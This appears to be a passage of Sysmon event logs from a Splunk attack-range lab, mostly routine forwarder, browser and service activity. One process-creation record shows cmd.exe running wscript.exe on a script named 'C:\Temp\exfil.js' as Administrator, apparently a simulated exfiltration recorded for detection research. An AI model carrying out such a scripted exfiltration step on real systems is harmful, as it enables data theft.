14:15:52.822{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=8127FE84689C7E936950F8BD5B581C96,SHA256=D69375D1A304EF1FBCB027C572890CBAC3D63937EC25F08FD8D203BE5215A4BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:52.269{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DCCD0FECC2456AE59F861F9D395CA96,SHA256=441ECD7022A270AA0F74532FFBE344DF07FCD4B126F29452EC1ED5480A07BB0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043891Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:53.307{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7318D3CE588D33263C82D91D6357F2FA,SHA256=8F51D15BA08C2FF6F008E40FB40930D4AA1F06EE9163A5C252B63254ED141880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:53.388{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5DF23CA0FFE4550A454000C381EA391,SHA256=3CC00B9947E9831FFE275B3749CF4A7620BC708C25A61612357F384D782B01F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043892Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:54.401{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1C4B6E5CBA41995CC92A6ED1D2FB48A,SHA256=D43DC79E7FD0C99FB27FB52A6E779976B7EC8A6CB4F83F6875253589920B685D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:54.522{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD3A2DF9B746602723E3D1066321AAA1,SHA256=90AE47DE0E0739C007331193F8E30817741D5E10FA426B2D3C95BC6361E2351D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:53.731{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56345-false10.0.1.12-8000- 23542300x8000000000000000193745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:55.568{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE792F6030A957639532AB57E72E0E56,SHA256=DEB58922D628095E0DA4C361D5FD49F4B0708A344D6B2AA52CDDE2AA0740EA6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043893Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:55.495{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B781B87354E903796343D3BBF9918B,SHA256=34E25552C0D4684C313D8A22080953A5D388816FFB4A7622BA6EBEFB4999017F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043894Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:56.589{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B37B3409089E33B9B30C35387C153AE6,SHA256=EE1A89FFE4E54237214E227B24C21DC26E686CA522A40AA61E53EF212B8242D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:56.586{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EEA9D7586842DA0E604EE9343B15BC5,SHA256=9BC0316FB9F8E7A08C49F22F923577B9DAFC41B07BB1FE7EF0685ACAE7C79AFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043896Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:57.682{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D79D7DE741F0E8A6377250C2CD42659,SHA256=4731993FD895A428E3B6296582798AE499E963A73BE8E736EEF604A730EE1886,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:57.635{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6129B396C97C3E822608F80DB18BC2E,SHA256=B7BD74628185BD428C0F8A506DB7AB97AB075A449F7BE83DDB606DBBC00E49F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043895Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:55.731{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043897Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:58.776{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09158CC8D81E3B2C4823C4BD9849C88C,SHA256=6C1BE7EA1AD9E3516646DFABB783E94F8D6B368C2E2E58EF8683361E6B05C80C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:58.683{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE9E8D1ADC66D6C938C4BA45347AF974,SHA256=E019E61721ED449135567F005BA14A4AB8034BE4A2DA6B5CA48A269E1C40D3A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043898Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:59.870{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE75CF8CBE4327ABB4C8B213C8DC1147,SHA256=6554C01F0FDD3B896BCC7A86B6DFE63C8523B407BED7D77DB95804F4425F307D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000193753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:59.983{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\SiteSecurityServiceState-1.txt2022-06-03 14:15:59.981 23542300x8000000000000000193752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:59.982{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\SiteSecurityServiceState-1.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000193751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:59.981{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\SiteSecurityServiceState-1.txt2022-06-03 14:15:59.981 23542300x8000000000000000193750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:59.818{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A9B55A5826E3F3292B745DECA1DDD24,SHA256=990F50180818D44FED3D6B9F6211414E30E7FE10337088B1B841F653E3191186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043899Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:00.964{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F709401ADAB7DDC4EB39F564FCBB6D,SHA256=DD7EBFBD8E0F737A35B645CB367C530D24568C584C96D4B08900052C0E1367D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:00.848{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24AF1CB49E51E802E22A7E8D7DFD5014,SHA256=62D04CD07B55D0C4896E9BAD1ED34F0B5F0225A6BDB89BFD4DDB739C640A45BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:00.802{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=254ABA34597666F59DF2EE0ED23ED988,SHA256=964894358430BA95DD6D5F8A398E50C43079076599D057445CECE891685B9F33,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000193756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:00.264{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\AlternateServices-1.txt2022-06-03 14:16:00.264 23542300x8000000000000000193755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:00.264{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\AlternateServices-1.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000193754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:00.264{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\AlternateServices-1.txt2022-06-03 14:16:00.264 23542300x8000000000000000193770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.985{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADAE822575F558698541B69D4AF59F98,SHA256=AD4AAA180D9894D0346296EBA37AB1C1D6CF446179ADEB8B952057EBDA20CA94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.248{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.248{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.232{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.232{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.232{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.232{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.232{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.232{2E1864BB-0F1D-629A-270A-000000005F02}46763536C:\Windows\system32\cmd.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.222{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Temp" 10341000x8000000000000000193759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:01.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043901Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:02.698{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B503B39F223288DBE51121F4C0CCEF84,SHA256=B58507F9C1AD2670B8283532D1393EAD01046B5B9F7CEEF3DB45E5447A5729BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043900Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:02.057{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68587E8C2BD040CC80521C2A84B6E58F,SHA256=6D670E7814F35323E059B0042B58E35636B0501A159DEB0C816370A4470B1478,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:02.301{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52566EBCB9AFBBD78EEEB7BC49761891,SHA256=1197C3929152B94EC43DFB6BEF49736D94DD13552AA8534AA82E4B90405DCF28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:02.252{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-225MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:59.727{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56346-false10.0.1.12-8000- 354300x800000000000000043903Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:01.793{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 